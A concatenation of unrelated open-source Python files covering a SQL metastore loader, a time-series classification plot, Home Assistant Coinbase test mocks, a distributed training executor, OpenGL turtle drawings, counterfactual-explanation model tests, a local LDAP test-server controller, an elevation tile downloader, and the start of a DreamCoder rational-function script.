return self._inspect.get_schema_names()
def get_all_table_names_in_schema(self, schema_name: str) -> List[str]:
return self._inspect.get_table_names(schema=schema_name)
def get_table_and_columns(
self, schema_name, table_name
) -> Tuple[DataTable, List[DataColumn]]:
if not self._engine.dialect.has_table(
self._conn, table_name=table_name, schema=schema_name
):
return None, []
table = DataTable(
name=table_name,
type=None,
owner=None,
table_created_at=None,
table_updated_by=None,
table_updated_at=None,
data_size_bytes=None,
location=None,
partitions=None,
raw_description="",
)
raw_columns = self._inspect.get_columns(
table_name=table_name, schema=schema_name
)
columns = list(
map(
lambda col: DataColumn(
name=col["name"],
type=str(col["type"]),
comment=f"Default:{col['default']} Nullable:{col['nullable']}",
),
raw_columns,
)
)
return table, columns
def _get_sqlalchemy(self, metastore_dict):
from sqlalchemy.engine import reflection
engine = create_sqlalchemy_engine(metastore_dict["metastore_params"])
inspect = reflection.Inspector.from_engine(engine)
conn = engine.connect()
return engine, inspect, conn
|
examples/classification/plot_time_series_forest.py
|
jmrichardson/pyts
| 1,217 |
78177
|
<filename>examples/classification/plot_time_series_forest.py
"""
==================
Time Series Forest
==================
This example illustrates which information is considered important
by the algorithm in order to classify time series. The index of
the most important window is retrieved via the ``feature_importance_``
and ``indices_`` attributes. The first time series for both classes
are plotted and the most important window is highlighted with a
larger line width.
It is implemented as :class:`pyts.classification.TimeSeriesForest`.
"""
# Author: <NAME> <<EMAIL>>
# License: BSD-3-Clause
import numpy as np
from pyts.datasets import load_gunpoint
from pyts.classification import TimeSeriesForest
import matplotlib.pyplot as plt
X_train, X_test, y_train, y_test = load_gunpoint(return_X_y=True)
clf = TimeSeriesForest(random_state=43)
clf.fit(X_train, y_train)
start_idxmax, end_idxmax = clf.indices_[
np.argmax(clf.feature_importances_) // 3]
plt.figure(figsize=(12, 5))
plt.plot(X_train[y_train == 1][0], label='First sample in class 1')
plt.plot(np.arange(start_idxmax, end_idxmax),
X_train[y_train == 1][0, start_idxmax:end_idxmax],
color='C0', lw=4)
plt.plot(X_train[y_train == 2][0], label='First sample in class 2')
plt.plot(np.arange(start_idxmax, end_idxmax),
X_train[y_train == 2][0, start_idxmax:end_idxmax],
color='C1', lw=4)
plt.legend(loc='best', fontsize=14)
plt.title('The most important window according to the feature importance '
'scores', fontsize=16)
plt.tight_layout()
plt.show()
|
tests/components/coinbase/common.py
|
MrDelik/core
| 30,023 |
78188
|
"""Collection of helpers."""
from homeassistant.components.coinbase.const import (
CONF_CURRENCIES,
CONF_EXCHANGE_RATES,
DOMAIN,
)
from homeassistant.const import CONF_API_KEY, CONF_API_TOKEN
from .const import GOOD_EXCHANGE_RATE, GOOD_EXCHANGE_RATE_2, MOCK_ACCOUNTS_RESPONSE
from tests.common import MockConfigEntry
class MockPagination:
"""Mock pagination result."""
def __init__(self, value=None):
"""Load simple pagination for tests."""
self.next_starting_after = value
class MockGetAccounts:
"""Mock accounts with pagination."""
def __init__(self, starting_after=0):
"""Init mocked object, forced to return two at a time."""
if (target_end := starting_after + 2) >= (
max_end := len(MOCK_ACCOUNTS_RESPONSE)
):
end = max_end
self.pagination = MockPagination(value=None)
else:
end = target_end
self.pagination = MockPagination(value=target_end)
self.accounts = {
"data": MOCK_ACCOUNTS_RESPONSE[starting_after:end],
}
self.started_at = starting_after
def __getitem__(self, item):
"""Handle subscript request."""
return self.accounts[item]
def mocked_get_accounts(_, **kwargs):
"""Return simplified accounts using mock."""
return MockGetAccounts(**kwargs)
def mock_get_current_user():
"""Return a simplified mock user."""
return {
"id": "123456-abcdef",
"name": "Test User",
}
def mock_get_exchange_rates():
"""Return a heavily reduced mock list of exchange rates for testing."""
return {
"currency": "USD",
"rates": {GOOD_EXCHANGE_RATE_2: "0.109", GOOD_EXCHANGE_RATE: "0.00002"},
}
async def init_mock_coinbase(hass, currencies=None, rates=None):
"""Init Coinbase integration for testing."""
config_entry = MockConfigEntry(
domain=DOMAIN,
unique_id=None,
title="Test User",
data={CONF_API_KEY: "123456", CONF_API_TOKEN: "AbCDeF"},
options={
CONF_CURRENCIES: currencies or [],
CONF_EXCHANGE_RATES: rates or [],
},
)
config_entry.add_to_hass(hass)
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
return config_entry
|
tutel/parted/backend/torch/executor.py
|
microsoft/tutel
| 156 |
78193
|
<gh_stars>100-1000
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os, sys
import time
import json
import torch
import torch.distributed as dist
from tutel import system
from tutel import net as C
def warp_bwd_allreduce(data, is_param):
if is_param:
fusable_params.add(id(data))
return C.allreduce_backward(data, group=parallel_env.global_group)
return C.allreduce_backward(data, group=parallel_env.model_group)
def sharded_randn(shape, dim, dtype, requires_grad=False, is_param=False, device=None):
if device is None:
device = parallel_env.local_device
torch.manual_seed(1)
complete_tensor = torch.tensor(torch.randn(shape, dtype=dtype, device='cpu').numpy(), device=device, requires_grad=requires_grad)
if dim >= 0:
result = torch.chunk(complete_tensor, chunks=parallel_env.model_size, dim=dim)[parallel_env.model_rank].contiguous()
elif dim == -2:
numel = complete_tensor.numel()
assert numel % parallel_env.model_size == 0
result = complete_tensor.view(parallel_env.model_size, -1)[parallel_env.model_rank].contiguous()
else:
result = complete_tensor.contiguous()
if is_param:
result = torch.nn.Parameter(result * 1e-3)
result.is_param = True
if dim == -2:
result._full_shape = shape
result.is_param = True
result.dim_state = dim
return result
def init_session(group_size, group_count=1, device_type='cuda'):
global parallel_env, fusable_params
parallel_env = system.init_data_model_parallel(group_count=group_count, backend='nccl' if device_type == 'cuda' else 'gloo')
fusable_params = set()
assert parallel_env.model_size == group_size, f"This codegen is designed for distributed parallelism = {group_size}, while current session only activates {parallel_env.model_size} device.\n\nPlease retry with command: mpiexec --allow-run-as-root -host localhost -x MASTER_ADDR=localhost -x LOCAL_SIZE={group_size} {sys.executable} -m tutel.launcher.run {sys.executable} {' '.join(sys.argv)}"
def model_executor(module, is_training=True):
name = module.compute_name
model = module().to(parallel_env.local_device)
inputs = module.synthetic_inputs()
output = model(**inputs)
params = model.parameters()
verbose = int(os.environ.get('VERBOSE', '0'))
is_cuda = (parallel_env.local_device.type == 'cuda')
is_training = is_training and isinstance(output, torch.Tensor)
start_result = output.contiguous().view(-1)[0] if isinstance(output, torch.Tensor) else -1
if verbose:
sys.stderr.write('[%d] %g %g .. %g (%s)\n' % (parallel_env.model_rank, output.flatten()[0], output.flatten()[1], output.flatten()[-1], output.shape))
if is_training:
torch.manual_seed(1)
label = torch.LongTensor(output.size(0)).random_(1).to(output.device)
if params:
optimizer = torch.optim.SGD(params, lr=1e-5)
else:
optimizer = model_executor
optimizer.zero_grad = optimizer.step = lambda *x: None
def next_step():
if parallel_env.group_count > 1:
dist.barrier()
if is_cuda:
torch.cuda.synchronize(parallel_env.local_device)
t_start = time.time()
if is_training:
optimizer.zero_grad()
result = model(**inputs).contiguous()
result = torch.nn.functional.log_softmax(result.view(result.size(0), -1), dim=1)
result = torch.nn.functional.nll_loss(result, label)
if parallel_env.model_rank == 0 and verbose:
sys.stderr.write(f' Loss = {result} ({output.shape}, {label.shape})\n')
result.backward(retain_graph=True)
if parallel_env.group_count > 1:
for p in params:
if id(p) not in fusable_params:
p.grad = simple_all_reduce(p.grad, group=parallel_env.data_group)
optimizer.step()
else:
result = model(**inputs)
result = result.contiguous().view(-1)[0] if isinstance(result, torch.Tensor) else -1
if parallel_env.group_count > 1:
dist.barrier()
if is_cuda:
torch.cuda.synchronize(parallel_env.local_device)
t_stop = time.time()
step_time = t_stop - t_start
if parallel_env.model_rank == 0 and verbose:
sys.stderr.write('Result(is_training=%s) = %g, cost = %s\n' % (is_training, result, step_time))
return step_time
for i in range(5):
next_step()
average_step_time = sum([next_step() for _ in range(5)]) / 5
if parallel_env.model_rank == 0:
sys.stderr.write(' [%s] digest = %g .., time = %g\n' % (name, start_result, average_step_time))
result = json.dumps({'name': name, 'step_time': average_step_time})
if 'CONFIG_STORE_PATH' in os.environ:
with open(os.environ['CONFIG_STORE_PATH'], 'w') as fp:
fp.write(result)
print(result)
|
PyOpenGLExample/turtle.py
|
DazEB2/SimplePyScripts
| 117 |
78194
|
import math
from OpenGL.GL import *
from OpenGL.GLUT import *
from OpenGL.GLU import *
"""
Turtle drawings
Once the functions reset(), turn(), turnTo() and forw() there is a possibility to
program a path. In essence this is very similar to using polar coordinates relative
to the last set point. Meaning you define the angle and the length over which a line
should be drawn. First an example will be given containing the full source, next will
will only focus on the display function since the same primitives will be used.
http://www.de-brauwer.be/wiki/wikka.php?wakka=PyOpenGLTurtle
"""
curX = 0.0
curY = 0.0
angle = 0.0
def reset():
""" Reset the position to the origin """
global curX
global curY
global angle
curX = 0.0
curY = 0.0
angle = 0.0
def turnTo(deg):
""" Turn to a certain angle """
global angle
angle = deg
def turn(deg):
""" Turn a certain number of degrees """
global angle
angle += deg
def forw(len, visible):
""" Move forward over a certain distance """
global curX
global curY
tmpX = curX
tmpY = curY
curX = curX + len * math.cos(math.radians(angle))
curY = curY + len * math.sin(math.radians(angle))
if visible:
glBegin(GL_LINE_STRIP)
glVertex2f(tmpX, tmpY)
glVertex2f(curX, curY)
glEnd()
def initFun():
glClearColor(1.0, 1.0, 1.0, 0.0)
glColor3f(0.0, 0.0, 0.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluOrtho2D(-100, 100, -100, 100)
def reshapeFun(w, h):
glViewport(0, 0, w, h)
# if w > h:
# glViewport((w-h)/2,0,h,h)
# else:
# glViewport(0,(h-w)/2,w,w)
def turtle_1():
glClear(GL_COLOR_BUFFER_BIT)
reset()
glColor3f(0.0, 0.0, 1.0)
L = 30
turnTo(0)
for i in range(0, 4):
forw(3 * L, True)
turn(90)
forw(L, True)
turn(90)
forw(L, True)
turn(90)
glFlush()
def turtle_2():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
length = 0
increment = 1
for i in range(0, 100):
forw(length, True)
turn(60)
length += increment
glFlush()
def turtle_3():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
length = 0
increment = 1
for i in range(0, 200):
forw(length, True)
turn(89.5)
length += increment
glFlush()
def turtle_4():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
length = 0
increment = 1
for i in range(0, 200):
forw(length, True)
turn(-144)
length += increment
glFlush()
def turtle_5():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
length = 0
increment = 1
for i in range(0, 200):
forw(length, True)
turn(170)
length += increment
glFlush()
def turtle_6():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
L = 10
length = L
for i in range(0, 10):
for j in range(0, 4):
forw(length, True)
turn(90)
length += L
glFlush()
def turtle_7():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
L = 3
length = L
for i in range(0, 100):
forw(length, True)
turn(90)
length += L
glFlush()
def turtle_8():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
forw(100, True)
turn(120)
forw(100, True)
turn(120)
forw(50, True)
turn(120)
forw(50, True)
turn(-120)
forw(50, True)
turn(-120)
forw(50, True)
turn(120)
forw(50, True)
glFlush()
def turtle_9():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
L = 50
for i in range(0, 3):
forw(L, True)
turn(-60)
forw(L, True)
turn(-120)
forw(L, True)
turn(-60)
forw(L, True)
glFlush()
def turtle_10():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
L = 30
for i in range(0, 3):
forw(L, True)
turn(60)
forw(L, True)
turn(60)
forw(L, True)
turn(60)
forw(L, True)
turn(-60)
glFlush()
if __name__ == '__main__':
glutInit()
glutInitWindowSize(400, 400)
glutCreateWindow(b"Turtle")
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutDisplayFunc(turtle_1)
# glutDisplayFunc(turtle_2)
# glutDisplayFunc(turtle_3)
# glutDisplayFunc(turtle_4)
# glutDisplayFunc(turtle_5)
# glutDisplayFunc(turtle_6)
# glutDisplayFunc(turtle_7)
# glutDisplayFunc(turtle_8)
# glutDisplayFunc(turtle_9)
# glutDisplayFunc(turtle_10)
glutReshapeFunc(reshapeFun)
initFun()
glutMainLoop()
|
tests/test_model_interface/test_base_model.py
|
sumugit/DiCE
| 527 |
78210
|
<gh_stars>100-1000
import pytest
import numpy as np
import dice_ml
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
from dice_ml.utils.exception import SystemException
class TestModelClassification:
def create_sklearn_random_forest_classifier(self, X, y):
rfc = RandomForestClassifier(n_estimators=10, max_depth=4,
random_state=777)
model = rfc.fit(X, y)
return model
def test_base_model_classification(self, create_iris_data):
x_train, x_test, y_train, y_test, feature_names, classes = \
create_iris_data
trained_model = self.create_sklearn_random_forest_classifier(x_train, y_train)
diceml_model = dice_ml.Model(model=trained_model, backend='sklearn')
diceml_model.transformer.initialize_transform_func()
assert diceml_model is not None
prediction_probabilities = diceml_model.get_output(x_test)
assert prediction_probabilities.shape[0] == x_test.shape[0]
assert prediction_probabilities.shape[1] == len(classes)
predictions = diceml_model.get_output(x_test, model_score=False).reshape(-1, 1)
assert predictions.shape[0] == x_test.shape[0]
assert predictions.shape[1] == 1
assert np.all(np.unique(predictions) == np.unique(y_test))
with pytest.raises(NotImplementedError):
diceml_model.get_gradient()
assert diceml_model.get_num_output_nodes2(x_test) == len(classes)
class TestModelRegression:
def create_sklearn_random_forest_regressor(self, X, y):
rfc = RandomForestRegressor(n_estimators=10, max_depth=4,
random_state=777)
model = rfc.fit(X, y)
return model
def test_base_model_regression(self, create_boston_data):
x_train, x_test, y_train, y_test, feature_names = \
create_boston_data
trained_model = self.create_sklearn_random_forest_regressor(x_train, y_train)
diceml_model = dice_ml.Model(model=trained_model, model_type='regressor', backend='sklearn')
diceml_model.transformer.initialize_transform_func()
assert diceml_model is not None
prediction_probabilities = diceml_model.get_output(x_test).reshape(-1, 1)
assert prediction_probabilities.shape[0] == x_test.shape[0]
assert prediction_probabilities.shape[1] == 1
predictions = diceml_model.get_output(x_test, model_score=False).reshape(-1, 1)
assert predictions.shape[0] == x_test.shape[0]
assert predictions.shape[1] == 1
with pytest.raises(NotImplementedError):
diceml_model.get_gradient()
with pytest.raises(SystemException):
diceml_model.get_num_output_nodes2(x_test)
|
desktop/core/ext-py/python-ldap-2.3.13/Tests/slapd.py
|
kokosing/hue
| 5,079 |
78211
|
"""
Utilities for starting up a test slapd server
and talking to it with ldapsearch/ldapadd.
"""
import sys, os, socket, time, subprocess, logging
_log = logging.getLogger("slapd")
def quote(s):
'''Quotes the '"' and '\' characters in a string and surrounds with "..."'''
return '"' + s.replace('\\','\\\\').replace('"','\\"') + '"'
def mkdirs(path):
"""Creates the directory path unless it already exists"""
if not os.access(os.path.join(path, os.path.curdir), os.F_OK):
_log.debug("creating temp directory %s", path)
os.mkdir(path)
return path
def delete_directory_content(path):
for dirpath,dirnames,filenames in os.walk(path, topdown=False):
for n in filenames:
_log.info("remove %s", os.path.join(dirpath, n))
os.remove(os.path.join(dirpath, n))
for n in dirnames:
_log.info("rmdir %s", os.path.join(dirpath, n))
os.rmdir(os.path.join(dirpath, n))
LOCALHOST = '127.0.0.1'
def find_available_tcp_port(host=LOCALHOST):
s = socket.socket()
s.bind((host, 0))
port = s.getsockname()[1]
s.close()
_log.info("Found available port %d", port)
return port
class Slapd:
"""
Controller class for a slapd instance, OpenLDAP's server.
This class creates a temporary data store for slapd, runs it
on a private port, and initialises it with a top-level dc and
the root user.
When a reference to an instance of this class is lost, the slapd
server is shut down.
"""
_log = logging.getLogger("Slapd")
# Use /var/tmp to placate apparmour on Ubuntu:
PATH_TMPDIR = "/var/tmp/python-ldap-test"
PATH_SBINDIR = "/usr/sbin"
PATH_BINDIR = "/usr/bin"
PATH_SCHEMA_CORE = "/etc/ldap/schema/core.schema"
PATH_LDAPADD = os.path.join(PATH_BINDIR, "ldapadd")
PATH_LDAPSEARCH = os.path.join(PATH_BINDIR, "ldapsearch")
PATH_SLAPD = os.path.join(PATH_SBINDIR, "slapd")
PATH_SLAPTEST = os.path.join(PATH_SBINDIR, "slaptest")
# TODO add paths for other OSs
def check_paths(cls):
"""
Checks that the configured executable paths look valid.
If they don't, then logs warning messages (not errors).
"""
for name,path in (
("slapd", cls.PATH_SLAPD),
("ldapadd", cls.PATH_LDAPADD),
("ldapsearch", cls.PATH_LDAPSEARCH),
):
cls._log.debug("checking %s executable at %s", name, path)
if not os.access(path, os.X_OK):
cls._log.warn("cannot find %s executable at %s", name, path)
check_paths = classmethod(check_paths)
def __init__(self):
self._config = []
self._proc = None
self._port = 0
self._tmpdir = self.PATH_TMPDIR
self._dn_suffix = "dc=python-ldap,dc=org"
self._root_cn = "Manager"
self._root_password = "password"
self._slapd_debug_level = 0
# Setters
def set_port(self, port):
self._port = port
def set_dn_suffix(self, dn):
self._dn_suffix = dn
def set_root_cn(self, cn):
self._root_cn = cn
def set_root_password(self, pw):
self._root_password = pw
def set_tmpdir(self, path):
self._tmpdir = path
def set_slapd_debug_level(self, level):
self._slapd_debug_level = level
def set_debug(self):
self._log.setLevel(logging.DEBUG)
self.set_slapd_debug_level('Any')
# getters
def get_url(self):
return "ldap://%s:%d/" % self.get_address()
def get_address(self):
if self._port == 0:
self._port = find_available_tcp_port(LOCALHOST)
return (LOCALHOST, self._port)
def get_dn_suffix(self):
return self._dn_suffix
def get_root_dn(self):
return "cn=" + self._root_cn + "," + self.get_dn_suffix()
def get_root_password(self):
return self._root_password
def get_tmpdir(self):
return self._tmpdir
def __del__(self):
self.stop()
def configure(self, cfg):
"""
Appends slapd.conf configuration lines to cfg.
Also re-initializes any backing storage.
Feel free to subclass and override this method.
"""
# Global
cfg.append("include " + quote(self.PATH_SCHEMA_CORE))
cfg.append("allow bind_v2")
# Database
ldif_dir = mkdirs(os.path.join(self.get_tmpdir(), "ldif-data"))
delete_directory_content(ldif_dir) # clear it out
cfg.append("database ldif")
cfg.append("directory " + quote(ldif_dir))
cfg.append("suffix " + quote(self.get_dn_suffix()))
cfg.append("rootdn " + quote(self.get_root_dn()))
cfg.append("rootpw " + quote(self.get_root_password()))
def _write_config(self):
"""Writes the slapd.conf file out, and returns the path to it."""
path = os.path.join(self._tmpdir, "slapd.conf")
ldif_dir = mkdirs(self._tmpdir)
if os.access(path, os.F_OK):
self._log.debug("deleting existing %s", path)
os.remove(path)
self._log.debug("writing config to %s", path)
file(path, "w").writelines([line + "\n" for line in self._config])
return path
def start(self):
"""
Starts the slapd server process running, and waits for it to come up.
"""
if self._proc is None:
ok = False
config_path = None
try:
self.configure(self._config)
self._test_configuration()
self._start_slapd()
self._wait_for_slapd()
ok = True
self._log.debug("slapd ready at %s", self.get_url())
self.started()
finally:
if not ok:
if config_path:
try: os.remove(config_path)
except os.error: pass
if self._proc:
self.stop()
def _start_slapd(self):
# Spawns/forks the slapd process
config_path = self._write_config()
self._log.info("starting slapd")
self._proc = subprocess.Popen([self.PATH_SLAPD,
"-f", config_path,
"-h", self.get_url(),
"-d", str(self._slapd_debug_level),
])
self._proc_config = config_path
def _wait_for_slapd(self):
# Waits until the LDAP server socket is open, or slapd crashed
s = socket.socket()
while 1:
if self._proc.poll() is not None:
self._stopped()
raise RuntimeError("slapd exited before opening port")
try:
self._log.debug("Connecting to %s", repr(self.get_address()))
s.connect(self.get_address())
s.close()
return
except socket.error:
time.sleep(1)
def stop(self):
"""Stops the slapd server, and waits for it to terminate"""
if self._proc is not None:
self._log.debug("stopping slapd")
if hasattr(self._proc, 'terminate'):
self._proc.terminate()
else:
import posix, signal
posix.kill(self._proc.pid, signal.SIGHUP)
#time.sleep(1)
#posix.kill(self._proc.pid, signal.SIGTERM)
#posix.kill(self._proc.pid, signal.SIGKILL)
self.wait()
def restart(self):
"""
Restarts the slapd server; ERASING previous content.
Starts the server even it if isn't already running.
"""
self.stop()
self.start()
def wait(self):
"""Waits for the slapd process to terminate by itself."""
if self._proc:
self._proc.wait()
self._stopped()
def _stopped(self):
"""Called when the slapd server is known to have terminated"""
if self._proc is not None:
self._log.info("slapd terminated")
self._proc = None
try:
os.remove(self._proc_config)
except os.error:
self._log.debug("could not remove %s", self._proc_config)
def _test_configuration(self):
config_path = self._write_config()
try:
self._log.debug("testing configuration")
verboseflag = "-Q"
if self._log.isEnabledFor(logging.DEBUG):
verboseflag = "-v"
p = subprocess.Popen([
self.PATH_SLAPTEST,
verboseflag,
"-f", config_path
])
if p.wait() != 0:
raise RuntimeError("configuration test failed")
self._log.debug("configuration seems ok")
finally:
os.remove(config_path)
def ldapadd(self, ldif, extra_args=[]):
"""Runs ldapadd on this slapd instance, passing it the ldif content"""
self._log.debug("adding %s", repr(ldif))
p = subprocess.Popen([self.PATH_LDAPADD,
"-x",
"-D", self.get_root_dn(),
"-w", self.get_root_password(),
"-H", self.get_url()] + extra_args,
stdin = subprocess.PIPE, stdout=subprocess.PIPE)
p.communicate(ldif)
if p.wait() != 0:
raise RuntimeError("ldapadd process failed")
def ldapsearch(self, base=None, filter='(objectClass=*)', attrs=[],
scope='sub', extra_args=[]):
if base is None: base = self.get_dn_suffix()
self._log.debug("ldapsearch filter=%s", repr(filter))
p = subprocess.Popen([self.PATH_LDAPSEARCH,
"-x",
"-D", self.get_root_dn(),
"-w", self.get_root_password(),
"-H", self.get_url(),
"-b", base,
"-s", scope,
"-LL",
] + extra_args + [ filter ] + attrs,
stdout = subprocess.PIPE)
output = p.communicate()[0]
if p.wait() != 0:
raise RuntimeError("ldapadd process failed")
# RFC 2849: LDIF format
# unfold
lines = []
for l in output.split('\n'):
if l.startswith(' '):
lines[-1] = lines[-1] + l[1:]
elif l == '' and lines and lines[-1] == '':
pass # ignore multiple blank lines
else:
lines.append(l)
# Remove comments
lines = [l for l in lines if not l.startswith("#")]
# Remove leading version and blank line(s)
if lines and lines[0] == '': del lines[0]
if not lines or lines[0] != 'version: 1':
raise RuntimeError("expected 'version: 1', got " + repr(lines[:1]))
del lines[0]
if lines and lines[0] == '': del lines[0]
# ensure the ldif ends with a blank line (unless it is just blank)
if lines and lines[-1] != '': lines.append('')
objects = []
obj = []
for line in lines:
if line == '': # end of an object
if obj[0][0] != 'dn':
raise RuntimeError("first line not dn", repr(obj))
objects.append((obj[0][1], obj[1:]))
obj = []
else:
attr,value = line.split(':',2)
if value.startswith(': '):
value = base64.decodestring(value[2:])
elif value.startswith(' '):
value = value[1:]
else:
raise RuntimeError("bad line: " + repr(line))
obj.append((attr,value))
assert obj == []
return objects
def started(self):
"""
This method is called when the LDAP server has started up and is empty.
By default, this method adds the two initial objects,
the domain object and the root user object.
"""
assert self.get_dn_suffix().startswith("dc=")
suffix_dc = self.get_dn_suffix().split(',')[0][3:]
assert self.get_root_dn().startswith("cn=")
assert self.get_root_dn().endswith("," + self.get_dn_suffix())
root_cn = self.get_root_dn().split(',')[0][3:]
self._log.debug("adding %s and %s",
self.get_dn_suffix(),
self.get_root_dn())
self.ldapadd("\n".join([
'dn: ' + self.get_dn_suffix(),
'objectClass: dcObject',
'objectClass: organization',
'dc: ' + suffix_dc,
'o: ' + suffix_dc,
'',
'dn: ' + self.get_root_dn(),
'objectClass: organizationalRole',
'cn: ' + root_cn,
''
]))
Slapd.check_paths()
if __name__ == '__main__' and sys.argv == ['run']:
logging.basicConfig(level=logging.DEBUG)
slapd = Slapd()
print("Starting slapd...")
slapd.start()
print("Contents of LDAP server follow:\n")
for dn,attrs in slapd.ldapsearch():
print("dn: " + dn)
for name,val in attrs:
print(name + ": " + val)
print("")
print(slapd.get_url())
slapd.wait()
|
joerd/source/gmted.py
|
Hivemapper/HM-colony-joerd
| 207 |
78223
|
from joerd.util import BoundingBox
import joerd.download as download
import joerd.check as check
import joerd.srs as srs
import joerd.mask as mask
from joerd.mkdir_p import mkdir_p
from shutil import copyfileobj
import os.path
import os
import requests
import logging
import re
import tempfile
import sys
import traceback
import subprocess
import glob
from osgeo import gdal
class GMTEDTile(object):
def __init__(self, parent, x, y):
self.url = parent.url
self.download_options = parent.download_options
self.base_dir = parent.base_dir
self.x = x
self.y = y
def __key(self):
return (self.x, self.y)
def __eq__(a, b):
return isinstance(b, type(a)) and \
a.__key() == b.__key()
def __hash__(self):
return hash(self.__key())
def _res(self):
return '300' if self.y == -90 else '075'
def _file_name(self):
res = self._res()
xname = "%03d%s" % (abs(self.x), "E" if self.x >= 0 else "W")
yname = "%02d%s" % (abs(self.y), "N" if self.y >= 0 else "S")
return "%(y)s%(x)s_20101117_gmted_mea%(res)s.tif" % \
dict(res=res, x=xname, y=yname)
def urls(self):
dir = "%s%03d" % ("E" if self.x >= 0 else "W", abs(self.x))
res = self._res()
dname = "/%(res)sdarcsec/mea/%(dir)s/" % dict(res=res, dir=dir)
return [self.url + dname + self._file_name()]
def verifier(self):
return check.is_gdal
def options(self):
return self.download_options
def output_file(self):
fname = self._file_name()
return os.path.join(self.base_dir, fname)
def unpack(self, store, tmp):
with store.upload_dir() as target:
mkdir_p(os.path.join(target, self.base_dir))
output_file = os.path.join(target, self.output_file())
mask.negative(tmp.name, "GTiff", output_file)
def freeze_dry(self):
return dict(type='gmted', x=self.x, y=self.y)
class GMTED(object):
def __init__(self, options={}):
self.num_download_threads = options.get('num_download_threads')
self.base_dir = options.get('base_dir', 'gmted')
self.url = options['url']
self.xs = options['xs']
self.ys = options['ys']
self.download_options = options
def get_index(self):
# GMTED is a static set of files - there's no need for an index, but we
# do need a directory to store stuff in.
if not os.path.isdir(self.base_dir):
os.makedirs(self.base_dir)
def existing_files(self):
for base, dirs, files in os.walk(self.base_dir):
for f in files:
if f.endswith('tif'):
yield os.path.join(base, f)
def rehydrate(self, data):
assert data.get('type') == 'gmted', \
"Unable to rehydrate %r from GMTED." % data
return GMTEDTile(self, data['x'], data['y'])
def downloads_for(self, tile):
tiles = set()
# if the tile scale is greater than 20x the GMTED scale, then there's no
# point in including GMTED, it'll be far too fine to make a difference.
# GMTED is 7.5 arc seconds at best (30 at the poles).
if tile.max_resolution() > 20 * 7.5 / 3600:
return tiles
# buffer by 0.1 degrees (48px) to grab neighbouring tiles to ensure
# that there's no tile edge artefacts.
tile_bbox = tile.latlon_bbox().buffer(0.1)
for y in self.ys:
for x in self.xs:
bbox = BoundingBox(x, y, x + 30, y + 20)
if tile_bbox.intersects(bbox):
tiles.add(GMTEDTile(self, x, y))
return tiles
def vrts_for(self, tile):
"""
Returns a list of sets of tiles, with each list element intended as a
separate VRT for use in GDAL.
The reason for this is that GDAL doesn't do any compositing _within_
a single VRT, so if there are multiple overlapping source rasters in
the VRT, only one will be chosen. This isn't often the case - most
raster datasets are non-overlapping apart from deliberately duplicated
margins.
"""
return [self.downloads_for(tile)]
def srs(self):
return srs.wgs84()
def filter_type(self, src_res, dst_res):
# seems like GRA_Lanczos has trouble with nodata, which is causing
# "ringing" near the edges of the data.
return gdal.GRA_Bilinear if src_res > dst_res else gdal.GRA_Cubic
def _parse_bbox(self, ns_deg, is_ns, ew_deg, is_ew, res):
bottom = int(ns_deg)
left = int(ew_deg)
if is_ns == 'S':
bottom = -bottom
if is_ew == 'W':
left = -left
b = BoundingBox(left, bottom, left + 30, bottom + 20)
return b
def create(options):
return GMTED(options)
|
bin/rational.py
|
Dragon-hxl/LARC
| 290 |
78237
|
<gh_stars>100-1000
import datetime
import os
import random
try:
import binutil # required to import from dreamcoder modules
except ModuleNotFoundError:
import bin.binutil # alt import if called as module
from dreamcoder.dreamcoder import explorationCompression, commandlineArguments
from dreamcoder.domains.arithmetic.arithmeticPrimitives import real, real_division, real_addition, real_multiplication
from dreamcoder.grammar import Grammar
from dreamcoder.program import Primitive, Abstraction, Application
from dreamcoder.recognition import ImageFeatureExtractor
from dreamcoder.task import DifferentiableTask, squaredErrorLoss
from dreamcoder.type import arrow, treal
from dreamcoder.utilities import testTrainSplit, eprint, numberOfCPUs
def makeTask(name, f, actualParameters):
xs = [x / 100. for x in range(-500, 500)]
maximum = 10
N = 50
inputs = []
outputs = []
for x in xs:
try:
y = f(x)
except BaseException:
continue
if abs(y) < maximum:
inputs.append(float(x))
outputs.append(float(y))
if len(inputs) >= N:
ex = list(zip(inputs, outputs))
ex = ex[::int(len(ex) / N)][:N]
t = DifferentiableTask(name,
arrow(treal, treal),
[((x,),y) for x, y in ex],
BIC=1.,
restarts=360, steps=50,
likelihoodThreshold=-0.05,
temperature=0.1,
actualParameters=actualParameters,
maxParameters=6,
loss=squaredErrorLoss)
t.f = f
return t
return None
def randomCoefficient(m=5):
t = 0.3
f = t + (random.random() * (m - t))
if random.random() > 0.5:
f = -f
f = float("%0.1f" % f)
return f
def randomOffset():
c = randomCoefficient(m=2.5)
def f(x): return x + c
name = "x + %0.1f" % c
return name, f
def randomPolynomial(order):
coefficients = [randomCoefficient(m=2.5) for _ in range(order + 1)]
def f(x):
return sum(c * (x**(order - j)) for j, c in enumerate(coefficients))
name = ""
for j, c in enumerate(coefficients):
e = order - j
if e == 0:
monomial = ""
elif e == 1:
monomial = "x"
else:
monomial = "x^%d" % e
if j == 0:
coefficient = "%0.1f" % c
else:
if c < 0:
coefficient = " - %.01f" % (abs(c))
else:
coefficient = " + %.01f" % c
name = name + coefficient + monomial
return name, f
def randomFactored(order):
offsets = [randomCoefficient(m=5) for _ in range(order)]
def f(x):
p = 1.
for o in offsets:
p = p * (x + o)
return p
name = ""
for c in offsets:
if c > 0:
name += "(x + %0.1f)" % c
else:
name += "(x - %0.1f)" % (abs(c))
return name, f
def randomRational():
no = random.choice([0, 1])
